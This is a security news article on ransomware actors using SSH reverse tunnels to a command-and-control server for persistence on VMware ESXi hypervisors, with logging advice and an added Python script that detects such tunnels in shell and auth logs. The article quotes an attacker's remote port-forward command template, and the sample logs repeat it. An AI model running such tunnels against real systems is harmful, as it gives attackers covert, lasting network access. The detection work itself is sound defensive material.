Ransomware actors targeting ESXi hypervisors with SSH Tunneling for persistence

Ransomware actors are increasingly targeting VMware ESXi bare-metal hypervisors, exploiting SSH tunneling to maintain persistent, undetected access to compromised systems.

According to cybersecurity firm Sygnia, threat actors are leveraging known vulnerabilities in ESXi appliances or exploiting compromised administrator credentials to gain initial access. Once inside, they exploit the hypervisor’s built-in SSH service, designed to allow system administrators to remotely manage the device. This service, however, is rarely monitored by many organizations, making it an attractive vector for attackers.

Ransomware actors are abusing the feature to establish persistence, move laterally within the network, and deploy ransomware payloads.

By using SSH tunneling, attackers can securely route traffic between the compromised hypervisor and external command-and-control (C2) servers.

For example, attackers can set up a remote port-forwarding configuration via SSH to establish a connection back to the C2 server, using a command such as ssh -fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>. This allows attackers to tunnel through the hypervisor and remain undetected for prolonged periods.

“Since ESXi appliances are resilient and rarely shut down unexpectedly, this tunneling serves as a semi-persistent backdoor within the network,” the researchers noted.

ESXi appliances use a distributed logging mechanism that separates log entries into multiple dedicated files, rather than consolidating them into one, as seen with traditional syslog formats. This approach, while organized, can complicate forensic investigations since logs are spread across various files.

To address this, configuring log forwarding from ESXi to an external syslog server is recommended for centralized monitoring and log retention. This setup ensures all relevant events are captured in one location. Key log files for investigating potential attacks, such as SSH tunneling, include /var/log/shell.log, /var/log/hostd.log, /var/log/auth.log, and /var/log/vobd.log.
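As an added example (not code from the article or from Sygnia), the script below applies the detection guidance above to the two most relevant log files: it scans ESXi shell.log lines for ssh invocations that carry a tunnel-creating flag (-R as in the command above, plus -L and -D), scans auth.log for accepted SSH logins, and correlates the two by checking whether the tunnel's destination host is also a source address that logged in. The log line formats, process IDs, timestamps and addresses are constructed sample values and assumptions, not data from the report; point the functions at lines forwarded to your syslog server to use them on real data.

```python
import re
from typing import Dict, List, Optional

# Constructed sample ESXi shell.log lines (assumed format: "<ts> shell[<pid>]: [<user>]: <command>").
SHELL_LOG = """\
2025-01-15T10:21:07Z shell[2103218]: [root]: esxcli network ip connection list
2025-01-15T10:22:33Z shell[2103218]: [root]: ssh -fN -R 127.0.0.1:1080 user@203.0.113.5
2025-01-15T10:25:10Z shell[2103218]: [root]: ssh -fNR 127.0.0.1:1081 user@203.0.113.5
2025-01-15T10:30:00Z shell[2103218]: [root]: ssh -p 22 backup@198.51.100.7
2025-01-15T10:31:00Z shell[2103218]: [root]: vim-cmd vmsvc/getallvms
"""

# Constructed sample ESXi auth.log lines (assumed OpenSSH "Accepted ... for <user> from <src>" format).
AUTH_LOG = """\
2025-01-15T10:19:55Z sshd[2103200]: Accepted keyboard-interactive/pam for root from 203.0.113.5 port 51234 ssh2
2025-01-15T10:19:58Z sshd[2103200]: pam_unix(sshd:session): session opened for user root by (uid=0)
"""

SHELL_RE = re.compile(r"^(?P<ts>\S+) shell\[\d+\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.+)$")
AUTH_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<src>\S+) port \d+"
)

# OpenSSH single-letter options that create a tunnel; -R is the one the article describes.
TUNNEL_FLAGS = {"R": "remote port forward", "L": "local port forward", "D": "dynamic SOCKS proxy"}


def tunnel_flags(cmd: str) -> List[str]:
    """Return the tunnel-creating flags in an ssh command line (handles bundled flags like -fNR)."""
    tokens = cmd.split()
    if not tokens or tokens[0] != "ssh":
        return []
    found: List[str] = []
    for tok in tokens[1:]:
        if tok.startswith("-") and not tok.startswith("--"):
            for letter in tok[1:]:
                if letter in TUNNEL_FLAGS and TUNNEL_FLAGS[letter] not in found:
                    found.append(TUNNEL_FLAGS[letter])
    return found


def remote_host(cmd: str) -> Optional[str]:
    """Extract the destination host from 'user@host' in an ssh command line, if present."""
    for tok in reversed(cmd.split()):
        if "@" in tok:
            return tok.rsplit("@", 1)[1]
    return None


def find_ssh_tunnels(shell_log: str) -> List[Dict[str, object]]:
    """Flag every interactive shell command that starts an ssh tunnel."""
    findings: List[Dict[str, object]] = []
    for line in shell_log.splitlines():
        m = SHELL_RE.match(line)
        if not m:
            continue
        flags = tunnel_flags(m.group("cmd"))
        if flags:
            findings.append({"ts": m.group("ts"), "user": m.group("user"),
                             "flags": flags, "host": remote_host(m.group("cmd")),
                             "cmd": m.group("cmd")})
    return findings


def find_ssh_logins(auth_log: str) -> List[Dict[str, str]]:
    """Collect accepted SSH logins (who, from where, how) from auth.log."""
    return [m.groupdict() for m in (AUTH_RE.match(l) for l in auth_log.splitlines()) if m]


def correlate(shell_log: str, auth_log: str) -> List[Dict[str, object]]:
    """Pair each tunnel with logins from the same address the tunnel connects back to.

    A tunnel whose destination also appears as an inbound login source is a strong
    indicator that an interactive operator set up the reverse channel.
    """
    logins = find_ssh_logins(auth_log)
    results = []
    for t in find_ssh_tunnels(shell_log):
        matching = [l for l in logins if l["src"] == t["host"]]
        results.append({"tunnel": t, "logins_from_same_host": matching})
    return results


if __name__ == "__main__":
    for r in correlate(SHELL_LOG, AUTH_LOG):
        t = r["tunnel"]
        print(f"{t['ts']} {t['user']}: {', '.join(t['flags'])} -> {t['host']} "
              f"(prior logins from that host: {len(r['logins_from_same_host'])})")
```

Running it on real logs is a matter of replacing the constructed strings with the contents of /var/log/shell.log and /var/log/auth.log (or the forwarded syslog copies); the flag parser deliberately handles bundled options such as -fNR so that a slight variation of the documented command line is not missed.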

